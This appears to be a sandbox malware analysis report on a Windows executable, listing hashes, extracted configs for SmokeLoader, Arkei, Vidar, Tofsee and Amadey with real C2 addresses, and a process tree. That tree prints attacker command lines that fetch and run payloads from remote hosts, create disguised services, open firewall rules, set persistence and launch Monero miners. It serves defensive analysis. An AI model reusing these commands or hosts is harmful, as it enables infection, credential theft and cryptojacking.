Overview

overview

10

Static

static

454bbaf81f...9a.exe

windows7_x64

10

454bbaf81f...9a.exe

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    13-01-2022 18:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    454bbaf81f9db2de623ece1917429c9a.exe

  • Size

    276KB

  • MD5

    454bbaf81f9db2de623ece1917429c9a

  • SHA1

    f1304597ef6cb482e11cf1a135410afa49bc0d56

  • SHA256

    3da9f4dae260d37237e8d8dff7d8b52053b97fc75a0a836934da446ba0089ca4

  • SHA512

    583e619a67b36e838277753a8651a93edfaac6bc8d642801e05f359fa5b211503c81ee835eaec8ab2827ef27f5c20739749c3b0f2a6c0b8789febe47c4622867

Score
10/10
amadeyarkeiloaderbotsmokeloadertofseevidarxmrig565defaultbackdoorcollectiondiscoveryevasionloaderminerpersistencespywarestealertrojanupx

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

arkei

Botnet

Default

C2

http://file-file-host4.com/tratata.php

Extracted

Family

tofsee

C2

patmushta.info

parubey.info

Extracted

Family

vidar

Version

49.6

Botnet

565

C2

https://noc.social/@banda5ker

https://mastodon.social/@banda6ker
Attributes
  • profile_id

    565

Extracted

Family

amadey

Version

3.01

C2

185.215.113.35/d2VxjasuwS/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

    loaderminerloaderbot
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Arkei Stealer Payload 2 IoCs
    stealer
  • LoaderBot executable 3 IoCs
  • Vidar Stealer 2 IoCs
    stealer
  • XMRig Miner Payload 1 IoCs
    miner
  • Blocklisted process makes network request 2 IoCs
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 13 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\454bbaf81f9db2de623ece1917429c9a.exe
    "C:\Users\Admin\AppData\Local\Temp\454bbaf81f9db2de623ece1917429c9a.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1524
    • C:\Users\Admin\AppData\Local\Temp\454bbaf81f9db2de623ece1917429c9a.exe
      "C:\Users\Admin\AppData\Local\Temp\454bbaf81f9db2de623ece1917429c9a.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:812
  • C:\Users\Admin\AppData\Local\Temp\713A.exe
    C:\Users\Admin\AppData\Local\Temp\713A.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:672
  • C:\Users\Admin\AppData\Local\Temp\7E97.exe
    C:\Users\Admin\AppData\Local\Temp\7E97.exe
    1⤵
    • Executes dropped EXE
    PID:668
  • C:\Users\Admin\AppData\Local\Temp\853D.exe
    C:\Users\Admin\AppData\Local\Temp\853D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1664
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nevpptmh\
      2⤵
        PID:456
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\dkfwbgsz.exe" C:\Windows\SysWOW64\nevpptmh\
        2⤵
          PID:1132
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create nevpptmh binPath= "C:\Windows\SysWOW64\nevpptmh\dkfwbgsz.exe /d\"C:\Users\Admin\AppData\Local\Temp\853D.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1392
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description nevpptmh "wifi internet conection"
            2⤵
              PID:1888
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start nevpptmh
              2⤵
                PID:1388
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:520
              • C:\Users\Admin\AppData\Local\Temp\920A.exe
                C:\Users\Admin\AppData\Local\Temp\920A.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:564
                • C:\Users\Admin\AppData\Local\Temp\920A.exe
                  C:\Users\Admin\AppData\Local\Temp\920A.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:432
              • C:\Windows\SysWOW64\nevpptmh\dkfwbgsz.exe
                C:\Windows\SysWOW64\nevpptmh\dkfwbgsz.exe /d"C:\Users\Admin\AppData\Local\Temp\853D.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1632
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:112
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1292
              • C:\Users\Admin\AppData\Local\Temp\1F4.exe
                C:\Users\Admin\AppData\Local\Temp\1F4.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:396
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im 1F4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1F4.exe" & del C:\ProgramData\*.dll & exit
                  2⤵
                    PID:1976
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im 1F4.exe /f
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1188
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      3⤵
                      • Delays execution with timeout.exe
                      PID:584
                • C:\Users\Admin\AppData\Local\Temp\C80.exe
                  C:\Users\Admin\AppData\Local\Temp\C80.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1620
                  • C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                    "C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
                    2⤵
                    • Executes dropped EXE
                    PID:1696
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\
                      3⤵
                        PID:1220
                        • C:\Windows\SysWOW64\reg.exe
                          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\
                          4⤵
                            PID:1068
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                          3⤵
                          • Creates scheduled task(s)
                          PID:584
                    • C:\Users\Admin\AppData\Local\Temp\1132.exe
                      C:\Users\Admin\AppData\Local\Temp\1132.exe
                      1⤵
                      • Executes dropped EXE
                      PID:1908
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\143C.tmp\143D.tmp\143E.bat C:\Users\Admin\AppData\Local\Temp\1132.exe"
                        2⤵
                          PID:1448
                          • C:\Users\Admin\AppData\Local\Temp\143C.tmp\143D.tmp\extd.exe
                            C:\Users\Admin\AppData\Local\Temp\143C.tmp\143D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1704
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1636\123.vbs"
                            3⤵
                            • Blocklisted process makes network request
                            PID:1688
                          • C:\Users\Admin\AppData\Local\Temp\143C.tmp\143D.tmp\extd.exe
                            C:\Users\Admin\AppData\Local\Temp\143C.tmp\143D.tmp\extd.exe "/download" "http://a0621298.xsph.ru/KX6KAZ9Tip.exe" "setup_c.exe" "" "" "" "" "" ""
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1888
                          • C:\Users\Admin\AppData\Local\Temp\1636\setup_c.exe
                            setup_c.exe
                            3⤵
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1220
                          • C:\Users\Admin\AppData\Local\Temp\143C.tmp\143D.tmp\extd.exe
                            C:\Users\Admin\AppData\Local\Temp\143C.tmp\143D.tmp\extd.exe "/download" "http://a0621298.xsph.ru/RMR.exe" "setup_m.exe" "" "" "" "" "" ""
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:924
                          • C:\Users\Admin\AppData\Local\Temp\1636\setup_m.exe
                            setup_m.exe
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Adds Run key to start application
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2040
                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                              4⤵
                              • Executes dropped EXE
                              PID:1016
                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                              4⤵
                              • Executes dropped EXE
                              PID:980
                          • C:\Users\Admin\AppData\Local\Temp\143C.tmp\143D.tmp\extd.exe
                            C:\Users\Admin\AppData\Local\Temp\143C.tmp\143D.tmp\extd.exe "/download" "http://a0621298.xsph.ru/c_setup.exe" "setup_s.exe" "" "" "" "" "" ""
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1616
                          • C:\Users\Admin\AppData\Local\Temp\1636\setup_s.exe
                            setup_s.exe
                            3⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1736
                          • C:\Users\Admin\AppData\Local\Temp\143C.tmp\143D.tmp\extd.exe
                            C:\Users\Admin\AppData\Local\Temp\143C.tmp\143D.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:756
                      • C:\Users\Admin\AppData\Local\Temp\4196.exe
                        C:\Users\Admin\AppData\Local\Temp\4196.exe
                        1⤵
                        • Executes dropped EXE
                        PID:584
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {61F2F9DC-CAB5-4A51-97CD-910FA39A2EDF} S-1-5-21-2329389628-4064185017-3901522362-1000:QSKGHMYQ\Admin:Interactive:[1]
                        1⤵
                          PID:1676
                          • C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                            C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                            2⤵
                            • Executes dropped EXE
                            PID:1220
                        • C:\Users\Admin\AppData\Local\Temp\75FF.exe
                          C:\Users\Admin\AppData\Local\Temp\75FF.exe
                          1⤵
                          • Executes dropped EXE
                          PID:328
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          1⤵
                          • Accesses Microsoft Outlook profiles
                          • outlook_office_path
                          • outlook_win_path
                          PID:1116
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          1⤵
                            PID:1664
                          • C:\Users\Admin\AppData\Local\Temp\9063.exe
                            C:\Users\Admin\AppData\Local\Temp\9063.exe
                            1⤵
                            • Executes dropped EXE
                            PID:328
                          • C:\Users\Admin\AppData\Local\Temp\C900.exe
                            C:\Users\Admin\AppData\Local\Temp\C900.exe
                            1⤵
                            • Executes dropped EXE
                            PID:1464

                          Network

                          MITRE ATT&CK Enterprise v6

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • memory/112-204-0x0000000000080000-0x0000000000095000-memory.dmp

                            Filesize

                            84KB

                            Download

                          • memory/112-205-0x0000000000080000-0x0000000000095000-memory.dmp

                            Filesize

                            84KB

                            Download

                          • memory/396-113-0x0000000000400000-0x00000000005D5000-memory.dmp

                            Filesize

                            1.8MB

                            Download

                          • memory/396-110-0x00000000002A8000-0x0000000000325000-memory.dmp

                            Filesize

                            500KB

                            Download

                          • memory/396-112-0x00000000005E0000-0x00000000006B6000-memory.dmp

                            Filesize

                            856KB

                            Download

                          • memory/432-86-0x0000000000400000-0x0000000000420000-memory.dmp

                            Filesize

                            128KB

                            Download

                          • memory/432-83-0x0000000000400000-0x0000000000420000-memory.dmp

                            Filesize

                            128KB

                            Download

                          • memory/432-82-0x0000000000400000-0x0000000000420000-memory.dmp

                            Filesize

                            128KB

                            Download

                          • memory/432-84-0x0000000000400000-0x0000000000420000-memory.dmp

                            Filesize

                            128KB

                            Download

                          • memory/432-85-0x0000000000400000-0x0000000000420000-memory.dmp

                            Filesize

                            128KB

                            Download

                          • memory/432-91-0x0000000000690000-0x0000000000691000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/432-90-0x0000000000400000-0x0000000000420000-memory.dmp

                            Filesize

                            128KB

                            Download

                          • memory/432-89-0x0000000000400000-0x0000000000420000-memory.dmp

                            Filesize

                            128KB

                            Download

                          • memory/564-71-0x0000000001030000-0x00000000010BA000-memory.dmp

                            Filesize

                            552KB

                            Download

                          • memory/564-70-0x0000000001030000-0x00000000010BA000-memory.dmp

                            Filesize

                            552KB

                            Download

                          • memory/564-74-0x00000000004B0000-0x00000000004B1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/564-75-0x0000000000F80000-0x0000000000F81000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/584-202-0x0000000002140000-0x00000000021A0000-memory.dmp

                            Filesize

                            384KB

                            Download

                          • memory/668-73-0x0000000000220000-0x000000000023C000-memory.dmp

                            Filesize

                            112KB

                            Download

                          • memory/668-72-0x0000000000020000-0x0000000000031000-memory.dmp

                            Filesize

                            68KB

                            Download

                          • memory/668-76-0x0000000000400000-0x0000000000458000-memory.dmp

                            Filesize

                            352KB

                            Download

                          • memory/672-79-0x0000000000240000-0x0000000000249000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/672-80-0x0000000000400000-0x0000000000452000-memory.dmp

                            Filesize

                            328KB

                            Download

                          • memory/672-78-0x0000000000230000-0x0000000000239000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/812-55-0x0000000000400000-0x0000000000409000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/812-57-0x0000000075AB1000-0x0000000075AB3000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/1116-250-0x0000000000150000-0x00000000001BB000-memory.dmp

                            Filesize

                            428KB

                            Download

                          • memory/1116-248-0x00000000001C0000-0x0000000000234000-memory.dmp

                            Filesize

                            464KB

                            Download

                          • memory/1220-150-0x00000000002A0000-0x0000000000300000-memory.dmp

                            Filesize

                            384KB

                            Download

                          • memory/1220-260-0x0000000000400000-0x0000000000578000-memory.dmp

                            Filesize

                            1.5MB

                            Download

                          • memory/1404-60-0x0000000002630000-0x0000000002646000-memory.dmp

                            Filesize

                            88KB

                            Download

                          • memory/1404-92-0x0000000003CF0000-0x0000000003D06000-memory.dmp

                            Filesize

                            88KB

                            Download

                          • memory/1448-140-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/1524-58-0x0000000000020000-0x0000000000028000-memory.dmp

                            Filesize

                            32KB

                            Download

                          • memory/1524-59-0x0000000000030000-0x0000000000039000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/1620-126-0x0000000000220000-0x0000000000258000-memory.dmp

                            Filesize

                            224KB

                            Download

                          • memory/1620-116-0x0000000000748000-0x0000000000766000-memory.dmp

                            Filesize

                            120KB

                            Download

                          • memory/1620-127-0x0000000000400000-0x0000000000578000-memory.dmp

                            Filesize

                            1.5MB

                            Download

                          • memory/1632-208-0x0000000000400000-0x0000000000454000-memory.dmp

                            Filesize

                            336KB

                            Download

                          • memory/1664-96-0x0000000000020000-0x000000000002D000-memory.dmp

                            Filesize

                            52KB

                            Download

                          • memory/1664-251-0x0000000000070000-0x0000000000077000-memory.dmp

                            Filesize

                            28KB

                            Download

                          • memory/1664-252-0x0000000000060000-0x000000000006C000-memory.dmp

                            Filesize

                            48KB

                            Download

                          • memory/1664-98-0x0000000000400000-0x0000000000454000-memory.dmp

                            Filesize

                            336KB

                            Download

                          • memory/1664-97-0x00000000002B0000-0x00000000002C3000-memory.dmp

                            Filesize

                            76KB

                            Download

                          • memory/1696-125-0x00000000002C8000-0x00000000002E6000-memory.dmp

                            Filesize

                            120KB

                            Download

                          • memory/1696-141-0x0000000000400000-0x0000000000578000-memory.dmp

                            Filesize

                            1.5MB

                            Download

                          • memory/1736-221-0x0000000073A50000-0x0000000073A9F000-memory.dmp

                            Filesize

                            316KB

                            Download

                          • memory/1736-228-0x0000000075980000-0x00000000759A7000-memory.dmp

                            Filesize

                            156KB

                            Download

                          • memory/1736-213-0x0000000073C10000-0x0000000073C25000-memory.dmp

                            Filesize

                            84KB

                            Download

                          • memory/1736-183-0x00000000012A0000-0x0000000001302000-memory.dmp

                            Filesize

                            392KB

                            Download

                          • memory/1736-214-0x0000000073C30000-0x0000000073C82000-memory.dmp

                            Filesize

                            328KB

                            Download

                          • memory/1736-216-0x0000000073C00000-0x0000000073C0D000-memory.dmp

                            Filesize

                            52KB

                            Download

                          • memory/1736-215-0x0000000074AD0000-0x0000000074B05000-memory.dmp

                            Filesize

                            212KB

                            Download

                          • memory/1736-220-0x0000000004C70000-0x0000000004C71000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1736-219-0x00000000756D0000-0x00000000756E9000-memory.dmp

                            Filesize

                            100KB

                            Download

                          • memory/1736-185-0x0000000074BD0000-0x0000000074C7C000-memory.dmp

                            Filesize

                            688KB

                            Download

                          • memory/1736-187-0x00000000756F0000-0x0000000075747000-memory.dmp

                            Filesize

                            348KB

                            Download

                          • memory/1736-182-0x0000000000100000-0x0000000000101000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1736-212-0x0000000073C90000-0x0000000073CA7000-memory.dmp

                            Filesize

                            92KB

                            Download

                          • memory/1736-222-0x0000000073BA0000-0x0000000073BF8000-memory.dmp

                            Filesize

                            352KB

                            Download

                          • memory/1736-225-0x0000000074920000-0x000000007492C000-memory.dmp

                            Filesize

                            48KB

                            Download

                          • memory/1736-227-0x000000006CC90000-0x000000006CCAC000-memory.dmp

                            Filesize

                            112KB

                            Download

                          • memory/1736-186-0x0000000074B20000-0x0000000074B67000-memory.dmp

                            Filesize

                            284KB

                            Download

                          • memory/1736-181-0x00000000746F0000-0x000000007473A000-memory.dmp

                            Filesize

                            296KB

                            Download

                          • memory/1736-194-0x0000000073E00000-0x0000000073E80000-memory.dmp

                            Filesize

                            512KB

                            Download

                          • memory/1736-231-0x00000000752C0000-0x00000000752CC000-memory.dmp

                            Filesize

                            48KB

                            Download

                          • memory/1736-189-0x0000000076700000-0x000000007685C000-memory.dmp

                            Filesize

                            1.4MB

                            Download

                          • memory/1736-230-0x0000000073990000-0x00000000739CD000-memory.dmp

                            Filesize

                            244KB

                            Download

                          • memory/1736-232-0x0000000075750000-0x000000007586D000-memory.dmp

                            Filesize

                            1.1MB

                            Download

                          • memory/1736-195-0x0000000075AB0000-0x00000000766FA000-memory.dmp

                            Filesize

                            12.3MB

                            Download

                          • memory/1736-191-0x0000000000370000-0x00000000003B5000-memory.dmp

                            Filesize

                            276KB

                            Download

                          • memory/1736-190-0x00000000012A0000-0x0000000001302000-memory.dmp

                            Filesize

                            392KB

                            Download

                          • memory/1736-192-0x00000000012A0000-0x0000000001302000-memory.dmp

                            Filesize

                            392KB

                            Download

                          • memory/1736-193-0x0000000075220000-0x00000000752AF000-memory.dmp

                            Filesize

                            572KB

                            Download

                          • memory/2040-162-0x0000000000270000-0x00000000002B5000-memory.dmp

                            Filesize

                            276KB

                            Download

                          • memory/2040-179-0x0000000073E00000-0x0000000073E80000-memory.dmp

                            Filesize

                            512KB

                            Download

                          • memory/2040-178-0x0000000075220000-0x00000000752AF000-memory.dmp

                            Filesize

                            572KB

                            Download

                          • memory/2040-177-0x0000000000D70000-0x00000000011CB000-memory.dmp

                            Filesize

                            4.4MB

                            Download

                          • memory/2040-168-0x0000000076700000-0x000000007685C000-memory.dmp

                            Filesize

                            1.4MB

                            Download

                          • memory/2040-176-0x0000000000D70000-0x00000000011CB000-memory.dmp

                            Filesize

                            4.4MB

                            Download

                          • memory/2040-166-0x00000000756F0000-0x0000000075747000-memory.dmp

                            Filesize

                            348KB

                            Download

                          • memory/2040-165-0x0000000074B20000-0x0000000074B67000-memory.dmp

                            Filesize

                            284KB

                            Download

                          • memory/2040-164-0x0000000074BD0000-0x0000000074C7C000-memory.dmp

                            Filesize

                            688KB

                            Download

                          • memory/2040-277-0x0000000000CD0000-0x0000000000CD1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/2040-161-0x0000000000100000-0x0000000000101000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/2040-159-0x00000000746F0000-0x000000007473A000-memory.dmp

                            Filesize

                            296KB

                            Download

                          • memory/2040-160-0x0000000000D70000-0x00000000011CB000-memory.dmp

                            Filesize

                            4.4MB

                            Download

                          • memory/2040-180-0x0000000075AB0000-0x00000000766FA000-memory.dmp

                            Filesize

                            12.3MB

                            Download